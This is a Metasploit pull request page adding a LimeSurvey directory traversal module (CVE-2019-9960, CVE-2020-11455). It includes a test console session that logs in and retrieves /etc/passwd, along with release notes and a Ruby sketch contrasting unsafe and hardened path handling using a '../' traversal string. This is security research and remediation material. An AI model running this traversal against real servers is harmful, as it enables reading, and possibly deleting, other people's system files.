limesurvey dir traversals #13215

Merged
merged 3 commits into from
Apr 14, 2020
Conversation

h00die
Contributor

@h00die h00die commented Apr 8, 2020

This PR adds 2 directory traversals for LimeSurvey.
The two CVEs I found were very similar, and most of the login/generic stuff overlapped, so I just put it in one module. This gives coverage back to at least Sep 25, 2017.

The one @mattaberegg credits for the newer CVE (do you want an email added, and do you know Michael Burkey's GitHub?)

This module has been verified against the following versions:

  • 4.1.11-200316 (the file retrieved will attempt to be deleted by the webapp)
  • 3.15.0-181008
  • 3.9.0-180604
  • 3.6.0-180328
  • 3.0.0-171222
  • 2.70.0-170921

Verification

  • install the app, it's on GitHub w/ a ton of releases
  • Start msfconsole
  • use auxiliary/scanner/http/limesurvey_zip_traversals
  • give it a good file, and creds
  • run
  • Verify you get the file. It doesn't print the contents in case it was something not screen friendly.
  • Document looks good

@mattaberegg
Contributor

No need to add an email, thanks. Michael's GitHub is @mburkey6

@h00die
Contributor Author

h00die commented Apr 8, 2020

@mburkey6 if you want an email added, just put it here and I'll add it!

@mburkey6

mburkey6 commented Apr 8, 2020 via email

@space-r7 space-r7 self-assigned this Apr 13, 2020
@space-r7
Contributor

Thanks, @h00die! I went ahead and tested against versions 3.15.7-190124 and 4.0.1-200120. Code looks good to me, so I can get this landed soon!

Test output:

msf5 > use auxiliary/scanner/http/limesurvey_zip_traversals
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > options

Module options (auxiliary/scanner/http/limesurvey_zip_traversals):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      7                yes       Traversal Depth (to reach the root folder)
   FILE       /etc/passwd      yes       The file to retrieve
   PASSWORD   password         yes       LimeSurvey Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the LimeSurvey installation
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USERNAME   admin            yes       LimeSurvey Username
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set rhosts 192.168.37.147
rhosts => 192.168.37.147
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set targeturi limesurvey-3.15
targeturi => limesurvey-3.15
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set verbose true
verbose => true
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => bDQ3XzVMYVF6czVyZlZSYW9-RzVnemtTTzRHeHp1c0e-_2uDc8l5t81_sXpcXxhC3AUe0NerypvJmhtH_emjOA==
[+] Login Successful
[*] Version Detected: 3.15.7
[*] Attempting to retrieve file
[+] File stored to: /Users/space/.msf4/loot/20200414112938_default_192.168.37.147__701555.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set targeturi limesurvey-4.0
targeturi => limesurvey-4.0
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => ZzJnVzJfSFBKZkRqZHU2UzVWbXRTUDRGNjQ5elBVU0Ml1jqeqjrvPzGD3K3do2wS96nyh_DuRbk5YLMFC2DFdw==
[+] Login Successful
[*] Version Detected: 4.0.1
[*] Attempting to retrieve file
[-] This method will possibly delete the file retrieved!!!
[+] File stored to: /Users/space/.msf4/loot/20200414113001_default_192.168.37.147__932337.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > set FILE /etc/apache2/apache2_blah.conf
FILE => /etc/apache2/apache2_blah.conf
msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > run

[*] CSRF: YII_CSRF_TOKEN => ZFJLckl0Y1FLNWxBZmRJX0pSWDg5dzd-djg0aXJYUknqBKdW9dCjQYAujtx6gCu7iWyuoAZw5fXov37Lfg4PGg==
[+] Login Successful
[*] Version Detected: 4.0.1
[*] Attempting to retrieve file
[-] This method will possibly delete the file retrieved!!!
[-] File not found or server not vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@space-r7 space-r7 merged commit 1bc40f8 into rapid7:master Apr 14, 2020
@space-r7
Contributor

space-r7 commented Apr 14, 2020

Release Notes

A new auxiliary module, modules/auxiliary/scanner/http/limesurvey_zip_traversals, that exploits two separate authenticated directory traversal vulnerabilities in LimeSurvey, CVE-2019-9960 and CVE-2020-11455. For versions between v4.0 and v4.1.11, the getZipFile() function allows for the download of arbitrary files due to insufficient sanitization of the path parameter. For versions v3.15.9 and lower, the downloadZip() function enables arbitrary file downloads via the unsanitized szip parameter.
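The release notes above describe the root cause of both CVEs as a user-supplied file name (the `path` or `szip` parameter) joined onto a server-side directory without being confined to it. The following is an added illustration of that failure mode and its fix, written in Ruby so it runs stand-alone; it is not LimeSurvey's code nor the Metasploit module, and the base directory `EXPORT_DIR`, the function names and the sample parameters are constructed for the example. It also generalises a little beyond the two CVEs: the hardened check rejects NUL bytes, absolute paths, `~` home-directory expansion and non-archive extensions, not only `../` sequences.

```ruby
require 'pathname'

# Constructed base directory that a hypothetical "download zip" endpoint is
# meant to serve archives from (not a real LimeSurvey path).
EXPORT_DIR = '/var/www/limesurvey/tmp'.freeze

# Unsafe pattern: the user parameter is appended to the base directory as-is.
# File.join never normalises "..", so the caller inherits whatever the client
# sent; once the web server opens the path, "../" segments walk out of the
# base directory and an absolute-looking suffix is simply concatenated.
def unsafe_zip_path(base, param)
  File.join(base, param)
end

# Hardened pattern: canonicalise the joined path lexically and require the
# result to remain inside the base directory. Returns the resolved path, or
# nil when the request must be refused with a 4xx.
def safe_zip_path(base, param)
  return nil if param.nil? || param.empty?
  # NUL bytes truncate paths in C-backed file APIs ("x.zip\0.txt" becomes "x.zip").
  return nil if param.include?("\0")
  # File.expand_path(param, base) ignores base when param is absolute, and
  # expands a leading "~" to a home directory, so both must be refused up front.
  return nil if Pathname.new(param).absolute? || param.start_with?('~')

  base_abs = File.expand_path(base)
  # Collapses "." and ".." without touching the filesystem. For a file that
  # already exists, follow this with File.realpath to also defeat symlinks.
  resolved = File.expand_path(param, base_abs)

  # Compare with a trailing separator so "/tmp2/x.zip" is not accepted as
  # being inside "/tmp".
  return nil unless resolved.start_with?(base_abs + File::SEPARATOR)
  # The endpoint only hands out archives; refuse anything else by extension.
  return nil unless File.extname(resolved) == '.zip'

  resolved
end

# What the unsafe join turns into once the OS resolves it; Ruby's expand_path
# mirrors the kernel's behaviour of clamping extra ".." segments at "/".
def resolved_unsafe_path(base, param)
  File.expand_path(unsafe_zip_path(base, param))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed parameters: one legitimate export, one traversal attempt.
  ['survey_export.zip', '../../../../../../../etc/passwd'].each do |p|
    puts "param=#{p.inspect}"
    puts "  unsafe resolves to: #{resolved_unsafe_path(EXPORT_DIR, p)}"
    puts "  hardened returns:   #{safe_zip_path(EXPORT_DIR, p).inspect}"
  end
end
```

The key design choice is to validate the resolved path rather than to strip `../` from the input: filtering substrings is easy to get wrong (double-encoded or mixed separators), whereas a prefix check on the canonical path is independent of how the client spelled the traversal. The seven `..` segments in the sample mirror the module's default `DEPTH` of 7 from the options listing above, which is enough to climb out of a four-component base directory.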

@h00die h00die deleted the limesurvey branch April 14, 2020 17:16
@h00die
Contributor Author

h00die commented Apr 14, 2020

Thanks @space-r7

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 29, 2020